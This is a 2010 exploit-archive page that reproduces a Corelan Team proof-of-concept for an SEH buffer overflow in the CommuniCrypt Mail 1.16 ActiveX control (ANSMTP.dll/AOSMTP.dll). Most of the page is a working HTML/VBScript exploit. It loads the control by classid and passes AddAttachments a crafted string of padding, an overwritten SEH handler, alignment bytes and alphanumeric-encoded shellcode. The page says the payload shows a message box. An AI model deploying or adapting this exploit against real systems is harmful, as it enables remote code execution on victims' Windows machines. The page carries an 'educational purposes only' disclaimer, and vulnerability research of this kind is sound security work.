Home / os / win7

CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX

Posted on 19 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================
CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX
======================================================

&lt;html&gt;
&lt;!--
        |------------------------------------------------------------------|
        |                         __               __                      |
        |   _________  ________  / /___ _____     / /____  ____ _____ ___  |
        |  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |
        | / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
        | \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
        |                                                                  |
        |                                       http://www.corelan.be:8800 |
        |                                              security@corelan.be |
        |                                                                  |
        |-------------------------------------------------[ EIP Hunters ]--|
  
# Software      : CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX
# Author        : Lincoln
# Date      : May 19, 2010
# Reference     : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-042
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# Communicrypt is running a vulnerable version of ANSMTP.dll/AOSMTP.dll
# See advisory for more details
#
--&gt;
&lt;object classid='clsid:F8D07B72-B4B4-46A0-ACC0-C771D4614B82' id='target' &gt;&lt;/object&gt;
&lt;script language='vbscript'&gt;
 
junk = String(284, &quot;A&quot;)
nseh = unescape(&quot;%eb%06%90%90&quot;)
seh  = unescape(&quot;%1c%e4%01%10&quot;)
align = unescape(&quot;%5a%5a%5c%5a%5a%5a%5a%5a%90%90%90%90&quot;)
 
'msgbox: &quot;Exploited by Corelan Security Team&quot;
sc   = (&quot;TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIK9KS8Z&quot;) &amp; _
(&quot;N7XYT3JT1IPI1YPI1YQYG9QY790IW9W9730CPCPC73QSP7610ZBJQQ0X0P6PQQP0712K1QW1PQ&quot;) &amp; _
(&quot;GBQQQRFR72G2VPQRW21Q1RQHPP7HW1W2RUQZPIQZ2Y1ZPKPM0KPKCYPQSTQU2TPJPTQUU10NVR&quot;) &amp; _
(&quot;PNV2PBQJQVV1QYPYPBPD0N2KPQ51QTRPPLPKPC761TPL0NBK1R0V772LPLPKV1F6W478PL0KV1&quot;) &amp; _
(&quot;RNQURPPNRK1U2FPPVX600OQWCXF02UPLVSPPQI1U0Q0KU1PKPOQXU1V1T0PL0KF0RLQV1TQURT&quot;) &amp; _
(&quot;PL0K0Q0UQW0LPLPK0PV40CVUPPT81SFQ0KPZPL0K0B3ZW758PNBK1S3ZQWPPPE0QPJPKW8SSG6&quot;) &amp; _
(&quot;PWV0QYPN2KQTBTPLPKQUPQPJPNQT2Q1YROF06QPK400KPL0NPLPO44PKRPQSQT0F2JPJ3QQZBO&quot;) &amp; _
(&quot;W40MPGD10KSG78SYPJV1PK0OQYBO1Y2O0EBK1SPL1U44PQVXV1BEPIPN0NBKW2CJQURTQUV1PJ&quot;) &amp; _
(&quot;PKQS1F0NBK0F2LW2BK0LPKQSRJQU0LPCFQQZPKPNRKQUV4PNRK1WRQ0MP8POBYV10T1V1T772L&quot;) &amp; _
(&quot;1U6QPJ53POW2QTQX0F79QX1DPOD9PKV50MF979V2PP58PLPN0PPNW4PNQXRLPPPRPK68PMPLPK&quot;) &amp; _
(&quot;0OQY2OPKPOPO49F1PUQVE4PMRKPQBNW9W8PMP20Q53PLW71UPLPD54611RPMP8PN2K792OQYBO&quot;) &amp; _
(&quot;PKPOPL1YG255PGD8G3PX72PLPPRLPERPPKPOV1SHPGQSW5CRQVPNPEWDQU6XPQ5561RCW5VUPD&quot;) &amp; _
(&quot;VRPM680QPLQTE40DQZ0LQYQXE6PCU60K0OPC2EQVU4PL79PK42V0600MRKPNPHPL5260PM0MBL&quot;) &amp; _
(&quot;PN2GW72L77QDW6P2PKQHPCRN79ROQYBOQYROPBQX0QT4W5RQPQW8QUT0PC1HW46P1SPGPB0N1R&quot;) &amp; _
(&quot;QUW4RQPK2KPKFXQS2L7544W6RFPK091XSS1UGH0P3QQRPM60QHQURPPQT8QRPYQUT0V0PTPQSE&quot;) &amp; _
(&quot;0QSHPDVU1S0BPPE90Q3T1SPX0QP0QSBCQU6U1SPSPQT8PBQU1RPL0PE10PBN1R1X0QFP0QPSPP&quot;) &amp; _
(&quot;RO60SBQUVXW30TPQ6PPPRBPCPIPQ481RPO73PYQRV4PPCUPQ3HW2E5PQU8QRPPPP2LW6PQPHQY&quot;) &amp; _
(&quot;PNRH0PPL1VQTQURR0M69PI2QW4T1PJ2RQSSRQSSS0PPQQVP2PKPOPHPP60FQPOFPQV6PPKPO61&quot;) &amp; _
(&quot;W5740HQU1JQQG1A&quot;)
 
 
boom = junk + nseh + seh + align + sc
 
target.AddAttachments boom
 
&lt;/script&gt;
&lt;/html&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-19]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP